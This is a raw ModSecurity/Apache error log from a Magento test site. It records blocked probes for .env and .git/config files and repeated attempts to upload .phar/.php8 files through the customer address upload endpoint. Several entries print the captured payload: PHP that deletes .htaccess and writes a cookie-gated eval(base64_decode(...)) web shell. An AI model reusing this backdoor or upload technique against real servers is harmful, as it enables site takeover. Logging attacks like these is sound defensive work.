[Wed Nov 26 18:19:36.899718 2025] [:error] [pid 336729] [client 157.230.19.140:55948] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSc2qBYc3OAEw9RHe6IsQgAAAAo"]
[Wed Nov 26 18:19:37.631210 2025] [:error] [pid 332763] [client 157.230.19.140:55962] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSc2qdg2L5I3j1bw0PolCwAAAAA"]
[Wed Nov 26 18:19:37.631471 2025] [:error] [pid 332763] [client 157.230.19.140:55962] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSc2qdg2L5I3j1bw0PolCwAAAAA"]
[Wed Nov 26 18:19:37.631639 2025] [:error] [pid 332763] [client 157.230.19.140:55962] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSc2qdg2L5I3j1bw0PolCwAAAAA"]
[Wed Nov 26 18:19:38.201309 2025] [:error] [pid 336733] [client 157.230.19.140:55968] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSc2qtFEE-YEDclto1jQugAAAA4"]
[Wed Nov 26 18:19:38.201582 2025] [:error] [pid 336733] [client 157.230.19.140:55968] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSc2qtFEE-YEDclto1jQugAAAA4"]
[Wed Nov 26 18:19:38.201768 2025] [:error] [pid 336733] [client 157.230.19.140:55968] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSc2qtFEE-YEDclto1jQugAAAA4"]
[Wed Nov 26 18:48:56.488588 2025] [:error] [pid 336733] [client 37.112.223.135:48180] [client 37.112.223.135] ModSecurity: Rule 7faf0f07dbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.phar"] [unique_id "aSc9iNFEE-YEDclto1jQvwAAAA4"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 18:48:56.489144 2025] [:error] [pid 336733] [client 37.112.223.135:48180] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.phar"] [unique_id "aSc9iNFEE-YEDclto1jQvwAAAA4"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 18:48:56.491658 2025] [:error] [pid 336733] [client 37.112.223.135:48180] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.phar"] [unique_id "aSc9iNFEE-YEDclto1jQvwAAAA4"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 18:48:56.491837 2025] [:error] [pid 336733] [client 37.112.223.135:48180] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.phar"] [unique_id "aSc9iNFEE-YEDclto1jQvwAAAA4"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 18:48:57.487094 2025] [:error] [pid 336733] [client 37.112.223.135:48180] [client 37.112.223.135] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: z688364f428d25.php8 found within FILES:custom_attributes[country_id]: z688364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSc9idFEE-YEDclto1jQwAAAAA4"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/6/z688364f428d25.phar
[Wed Nov 26 18:48:57.487773 2025] [:error] [pid 336733] [client 37.112.223.135:48180] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSc9idFEE-YEDclto1jQwAAAAA4"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/6/z688364f428d25.phar
[Wed Nov 26 18:48:57.488004 2025] [:error] [pid 336733] [client 37.112.223.135:48180] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSc9idFEE-YEDclto1jQwAAAAA4"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/6/z688364f428d25.phar
[Wed Nov 26 18:48:57.952773 2025] [:error] [pid 336733] [client 37.112.223.135:48180] [client 37.112.223.135] ModSecurity: Rule 7faf0f07dbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.php8"] [unique_id "aSc9idFEE-YEDclto1jQwQAAAA4"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 18:48:57.953275 2025] [:error] [pid 336733] [client 37.112.223.135:48180] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.php8"] [unique_id "aSc9idFEE-YEDclto1jQwQAAAA4"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 18:48:57.955900 2025] [:error] [pid 336733] [client 37.112.223.135:48180] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.php8"] [unique_id "aSc9idFEE-YEDclto1jQwQAAAA4"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 18:48:57.956111 2025] [:error] [pid 336733] [client 37.112.223.135:48180] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/6/z688364f428d25.php8"] [unique_id "aSc9idFEE-YEDclto1jQwQAAAA4"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Nov 27 11:56:13.170849 2025] [:error] [pid 353185] [client 185.65.202.110:37608] [client 185.65.202.110] ModSecurity: Rule 7f0b91127be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/a/8a88364f428d25.phar"] [unique_id "aSguTXTG8IrOxOxezX5AdQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Nov 27 11:56:13.171328 2025] [:error] [pid 353185] [client 185.65.202.110:37608] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/a/8a88364f428d25.phar"] [unique_id "aSguTXTG8IrOxOxezX5AdQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Nov 27 11:56:13.173763 2025] [:error] [pid 353185] [client 185.65.202.110:37608] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/a/8a88364f428d25.phar"] [unique_id "aSguTXTG8IrOxOxezX5AdQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Nov 27 11:56:13.173959 2025] [:error] [pid 353185] [client 185.65.202.110:37608] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/a/8a88364f428d25.phar"] [unique_id "aSguTXTG8IrOxOxezX5AdQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Nov 27 11:56:13.464970 2025] [:error] [pid 353185] [client 185.65.202.110:37608] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 8a88364f428d25.php8 found within FILES:custom_attributes[country_id]: 8a88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSguTXTG8IrOxOxezX5AdgAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/8/a/8a88364f428d25.phar
[Thu Nov 27 11:56:13.465689 2025] [:error] [pid 353185] [client 185.65.202.110:37608] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSguTXTG8IrOxOxezX5AdgAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/8/a/8a88364f428d25.phar
[Thu Nov 27 11:56:13.465892 2025] [:error] [pid 353185] [client 185.65.202.110:37608] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSguTXTG8IrOxOxezX5AdgAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/8/a/8a88364f428d25.phar
[Thu Nov 27 11:56:13.643648 2025] [:error] [pid 353185] [client 185.65.202.110:37608] [client 185.65.202.110] ModSecurity: Rule 7f0b91127be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/a/8a88364f428d25.php8"] [unique_id "aSguTXTG8IrOxOxezX5AdwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Nov 27 11:56:13.644121 2025] [:error] [pid 353185] [client 185.65.202.110:37608] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/a/8a88364f428d25.php8"] [unique_id "aSguTXTG8IrOxOxezX5AdwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Nov 27 11:56:13.646584 2025] [:error] [pid 353185] [client 185.65.202.110:37608] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/a/8a88364f428d25.php8"] [unique_id "aSguTXTG8IrOxOxezX5AdwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Nov 27 11:56:13.646779 2025] [:error] [pid 353185] [client 185.65.202.110:37608] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/a/8a88364f428d25.php8"] [unique_id "aSguTXTG8IrOxOxezX5AdwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:02:28.540302 2025] [php:error] [pid 376662] [client 40.113.19.56:1398] script '/var/www/magento.test.indacotrentino.com/www/pub/images/m.php' not found or unable to stat
[Fri Nov 28 05:09:58.013187 2025] [:error] [pid 376626] [client 144.124.225.151:53776] [client 144.124.225.151] ModSecurity: Rule 7fa16a338be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/c/nc88364f428d25.phar"] [unique_id "aSkglhY37ftiQrkmT0VbBQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:09:58.013643 2025] [:error] [pid 376626] [client 144.124.225.151:53776] [client 144.124.225.151] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/c/nc88364f428d25.phar"] [unique_id "aSkglhY37ftiQrkmT0VbBQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:09:58.015993 2025] [:error] [pid 376626] [client 144.124.225.151:53776] [client 144.124.225.151] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/c/nc88364f428d25.phar"] [unique_id "aSkglhY37ftiQrkmT0VbBQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:09:58.016207 2025] [:error] [pid 376626] [client 144.124.225.151:53776] [client 144.124.225.151] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/c/nc88364f428d25.phar"] [unique_id "aSkglhY37ftiQrkmT0VbBQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
